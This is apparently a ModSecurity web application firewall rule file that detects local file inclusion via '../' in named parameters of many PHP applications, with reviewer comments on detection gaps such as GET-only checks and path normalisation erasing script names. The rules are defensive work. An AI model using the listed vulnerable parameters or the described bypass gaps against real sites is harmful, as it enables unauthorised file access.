Thyme export.php export_to Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /export.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009169,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33731'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:export_to "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009789) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /examples/tbs_us_examples_0view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009789,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:script "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009726) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009726,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File 
Inclusion',tag:'web-application-attack',tag:'bugtraq,34617'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:inc_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009729) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion
# Three-link chain: the request line must contain "/cms_detect.php" and "GET ",
# and the "include" argument must contain "../". On a full match the rule adds
# the critical anomaly score and records a WEB_ATTACK/LFI TX variable named
# after the matched argument.
# NOTE(review): the t: transformations are listed only on the chain starter;
# confirm which transformations the chained ARGS check runs with in the deployed
# ModSecurity version, since "@contains ../" is a literal comparison.
SecRule REQUEST_LINE "@contains /cms_detect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009729,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34634'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:include "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008923) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion
# Three-link chain: the request line must contain "/index.php" and "GET ", and
# at least one TX variable must exist whose name matches DIR_TRAVERSAL.*ARGS:m.
# Depends on an earlier rule having stored a DIR_TRAVERSAL TX variable for the
# argument; confirm that rule is enabled and evaluated before this one.
# NOTE(review): the selector is an unanchored regular expression, so it matches
# a TX variable for any argument whose name begins with "m", and "/index.php"
# is present on most PHP sites. Expect this rule to add the critical anomaly
# score for traversal hits unrelated to TxtBlog; consider enabling it only on
# hosts that run the application.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008923,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32498'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:m/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010127)
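SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion
# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected although ARGS
# also holds body parameters, and the chained checks set no t: actions of
# their own (they run with whatever SecDefaultAction supplies - confirm).
SecRule REQUEST_FILENAME "@contains /include/timesheet.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010127,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:config[include_dir] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010255) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /debugger/debug_php.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010255,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:_GET[filename] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009306) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009306,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File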
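Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected although ARGS
# also holds body parameters, and the chained checks set no t: actions of
# their own (they run with whatever SecDefaultAction supplies - confirm).

# (2009308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /ST_browsers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009308,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009310) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /ST_countries.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009310,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File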
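Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected although ARGS
# and REQUEST_BODY also cover body data, and the chained checks set no t:
# actions of their own (they run with whatever SecDefaultAction supplies -
# confirm).

# (2009312) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /ST_platforms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009312,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure
# The last two links look for "book_id=" and a ../ sequence anywhere in the
# query string or body; they are not tied to the same parameter.
SecRule REQUEST_FILENAME "@contains /books/getConfig.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009010,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure',tag:'web-application-attack',tag:'bugtraq,32966'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule QUERY_STRING|REQUEST_BODY "@contains book_id=" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:(\.\.\/){1,})" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009926) SpiderLabs Research (SLR) Public Vulns: ET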
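WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion
# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected although ARGS
# also holds body parameters, and the chained checks set no t: actions of
# their own (they run with whatever SecDefaultAction supplies - confirm).
SecRule REQUEST_FILENAME "@contains /includes/function_core.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009926,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:web_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion
SecRule REQUEST_FILENAME "@contains /templates/layout_lyrics.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009928,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:web_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009194) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /mini.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009194,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,31460'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:help_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /update_trailer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009191,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:context[path_to_root] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009393) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion
SecRule REQUEST_FILENAME "@contains /cuenta/cuerpo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009393,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30345'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:base_archivo "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET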
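WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link (where present) leaves other methods
# uninspected although ARGS also holds body parameters, and the chained
# checks set no t: actions of their own (they run with whatever
# SecDefaultAction supplies - confirm).

# (2009329) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /locales.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009329,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33965'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:srclang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /artmedic_print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009661,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:date "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009790) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /arch.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009790,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34968'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:arch "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS beLive arch.php arch Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009875) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /_functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009875,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35103'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:GLOBALS[prefix] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce _functions.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /123flashchat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009436,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:e107path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 123 FlashChat Module 123flashchat.php e107path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009224) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion
# Two-link chain: this rule has no "GET " link, so it applies to every method.
SecRule REQUEST_FILENAME "@contains /index_inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009224,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33774'"
    SecRule ARGS:inc_ordner "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ea-gBook index_inc.php inc_ordner parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008849) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion
# The last link counts TX variables whose names match DIR_TRAVERSAL.*ARGS:module;
# presumably these are set by an earlier traversal rule - verify rule ordering.
SecRule REQUEST_FILENAME "@contains /modules/3rdparty/adminpart/add3rdparty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008849,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms add3rdparty.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008850) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter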
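Local File Inclusion
# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected, and the last
# link only counts TX variables whose names match DIR_TRAVERSAL.*ARGS:module -
# presumably set by an earlier traversal rule; verify rule ordering.
SecRule REQUEST_FILENAME "@contains /modules/polling/adminpart/addpolling.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008850,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addpolling.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008851) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /modules/contact/adminpart/addcontact.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008851,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addcontact.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008852) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /modules/brandnews/adminpart/addbrandnews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008852,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module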
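parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addbrandnews.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the chain starters below match the script path on
# REQUEST_FILENAME instead of REQUEST_LINE. t:normalisePathWin removes ../
# back-references together with the preceding path segment; applied to the
# whole request line, a traversal sequence in the query string can erase the
# script name, so the chain would not start on the requests it targets.
# Not changed: the "GET " link leaves other methods uninspected, and the last
# link only counts TX variables whose names match DIR_TRAVERSAL.*ARGS:module -
# presumably set by an earlier traversal rule; verify rule ordering.

# (2008853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion
SecRule REQUEST_FILENAME "@contains /modules/newsletter/adminpart/addnewsletter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008853,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32180'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS evision cms addnewsletter.php module parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008854) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS evision cms addgame.php module parameter Local File Inclusion
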